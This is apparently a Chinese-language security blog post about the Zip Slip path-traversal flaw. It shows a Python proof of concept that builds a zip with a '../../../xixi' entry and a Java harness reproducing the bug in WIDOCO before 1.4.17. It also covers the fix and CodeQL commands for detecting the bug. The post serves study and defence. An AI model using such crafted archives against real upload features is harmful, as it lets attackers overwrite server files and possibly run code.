最近看到许少的推有说到Zip Slip这个漏洞导致的RCE,其实我在代码审计的时候确实发现有不少功能模块都是使用ZIP来解压,其实还是在真实系统中经常见到的。
于是想着好久没有写过博客了,想借着这次机会更新一下吧,免得读者以为我在偷懒没学习了~
Zip Slip是一种在压缩包中特制(../../../evil.sh)的解压缩文件替换漏洞,包括多种解压缩如tar、jar、war、cpio、apk、rar、7z和zip等。
Java中较为常见的场景是上传压缩包进行解压的时候,后端使用解压类直接将压缩包当中的节点解压出来,可能会通过节点的名字../跳转到上级目录中,从而导致任意目录的文件替换。如果结合系统特性和某些定时任务脚本,就可能导致RCE的执行,因此该漏洞也被标记为高危漏洞。
我从先知上TGAO师傅发布的文章里面公布的poc:
import zipfile
if \_\_name\_\_ == "\_\_main\_\_":
try:
zipFile \= zipfile.ZipFile("poc.zip", "a", zipfile.ZIP\_DEFLATED)
info \= zipfile.ZipInfo("poc.zip")
zipFile.write("E:/qqq.txt", "../../../xixi", zipfile.ZIP\_DEFLATED)
zipFile.close()
except IOError as e:
raise e
其中qqq.txt是需要压缩的文件,../../../xixi是该文件在压缩包中的名字
之后在Java中使用zipEntry.getName()等方法获取的就是../../../xixi这个字符串
更多的框架Zip-Slip漏洞可以在开源项目中找到:https://github.com/snyk/zip-slip-vulnerability
该类是Jdk中自带的原生类,在TGAO师傅发布的文章中介绍到了,这里就不在赘述了
WIDOCO是一个用于记录本体的向导。帮助您通过在GUI中执行一系列步骤,自动发布和创建一个丰富的、定制的本体文档。 WIDOCO在1.4.17版本之前存在Zip-Slip漏洞,漏洞点在src/main/java/widoco/WidocoUtils.java文件中,通过unZipIt函数可以将zip包中的文件写入到任意可写入的文件夹中,这将影响服务器的完整性。
查看1.4.17版本和Github上Master最新的版本做对比
发现是在方法Unzipit中进行了修补
首先添加Widoco有漏洞版本到项目依赖中
<dependencies\>
<dependency\>
<groupId\>com.github.dgarijo</groupId\>
<artifactId\>Widoco</artifactId\>
<version\>v1.4.16</version\>
</dependency\>
</dependencies\>
\[ ... \]
<repositories\>
<repository\>
<id\>jitpack.io</id\>
<url\>https://jitpack.io</url\>
</repository\>
</repositories\>
运行poc.py,设置跨越到上级目录../xixi文件
再编写漏洞利用代码,模拟真实场景下压缩包解压的情况
package javaTest;
import widoco.WidocoUtils;
public class GST {
public static void main(String\[\] args){
String path \= GST.class.getResource("/").toString();
System.out.println("path = " + path);
String resourceName \= "/poc.zip";
String outputFolder \= "E:\\\\work\\\\TempVuln\\\\tempDir";
WidocoUtils.unZipIt(resourceName,outputFolder);
System.out.println("Done");
}
}
执行后xixi文件就直接被解压到上级目录下,造成Zip-Slip漏洞
再来看看修复方案,是判断解压的路径和设置的目标主目录是否是相等的,如果不是则抛出异常
首先下载目标对应版本的项目,使用如下命令创建数据库
codeql database create qldb-test -l java
创建成功后会有successful的提示
之后使用database analyze进行分析
codeql database analyze qldb-test E:\\codeql\\ql\\java\\ql\\src\\Security\\CWE --format=sarifv2.1.0 --output=result.sarif
这里的路径是CWE的分析规则,挨个进行分析
在该目录会生成一个result.sarif文件,通过vscode的sarif viewer插件打开
打开sarif文件,从RULES一栏中可以看到zipslip的漏洞就发现了
如此的漏洞,在代码审计和系统中很多开发人员都不知道,也许随手就拿来用了
[2].https://github.com/snyk/zip-slip-vulnerability
[3].https://xz.aliyun.com/t/12081